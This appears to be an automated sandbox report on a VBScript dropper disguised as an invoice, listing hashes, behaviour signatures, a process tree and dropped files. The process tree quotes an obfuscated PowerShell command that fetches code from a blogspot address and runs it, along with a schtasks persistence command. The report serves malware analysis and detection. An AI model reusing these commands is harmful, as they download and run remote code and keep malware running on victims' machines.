Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/08/2023, 13:19

General

  • Target

    lnvoice#84398 .vbs

  • Size

    742KB

  • MD5

    f5a9780ca06cfd76ac732679199669ce

  • SHA1

    23d08435097e4dcc6b81f93fa01e05c9da950314

  • SHA256

    e5fbda4b9b341ba504f31522dd0a204ce7c56c2ff288aba7463c7dc06a6eec36

  • SHA512

    3b7a31f73eb07890bb4fd593a1373d71577022c5181636ac09b6b6b349a4b9a61d7985f8d7b2be409fbb247ea6e07bf2d4ee21f76451025a129c2fa6f7cb15a1

  • SSDEEP

    48:8000000X0G35q43/ZiG6UZX1Nd3B3U43C6K3541NN+w53B464Swf3ZZNNfSmqXXT:HRC

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 2 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lnvoice#84398 .vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c $((irm usabiz9s.blogspot.com/atom.xml) | .('{1}{0}'-f'MOOOT','I').replace('MOOOT','ex'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Registers COM server for autorun
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3332
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:3508
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
            PID:2452
          • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            3⤵
              PID:3848
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 187 /tn clomepe /F /tr "wscript //nologo C:\\ProgramData\\TUKHAMTASSER\\kilng.vbs"
              3⤵
              • Creates scheduled task(s)
              PID:4676

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\TUKHAMTASSER\kilng.vbs

          Filesize

          252B

          MD5

          21f034734cf5a764e68e655696c127e9

          SHA1

          c12867f065b91382d9537cfbbb58d65efe62bd3e

          SHA256

          3f9dedff42ad75ea6a7944816a5ceff216bd67bcc2175a6703787aec01b4233d

          SHA512

          cbfcb52377907c247436ccd1e3656729d0d380784f220e1ed05c7b1d3b5d52daaa44dc90adad07836dca5c02a88a435b71d07dde9775a361d5f6975778ef5113

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_exvfp1ow.xcj.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/2452-151-0x0000000000400000-0x0000000000474000-memory.dmp

          Filesize

          464KB

        • memory/3332-133-0x000001AF798F0000-0x000001AF79912000-memory.dmp

          Filesize

          136KB

        • memory/3332-143-0x00007FFE8AFF0000-0x00007FFE8BAB1000-memory.dmp

          Filesize

          10.8MB

        • memory/3332-144-0x000001AF78AE0000-0x000001AF78AF0000-memory.dmp

          Filesize

          64KB

        • memory/3332-145-0x000001AF79FE0000-0x000001AF7A1A2000-memory.dmp

          Filesize

          1.8MB

        • memory/3332-147-0x00007FFE8AFF0000-0x00007FFE8BAB1000-memory.dmp

          Filesize

          10.8MB

        • memory/3332-148-0x000001AF78AE0000-0x000001AF78AF0000-memory.dmp

          Filesize

          64KB

        • memory/3332-149-0x000001AF79E10000-0x000001AF79E2A000-memory.dmp

          Filesize

          104KB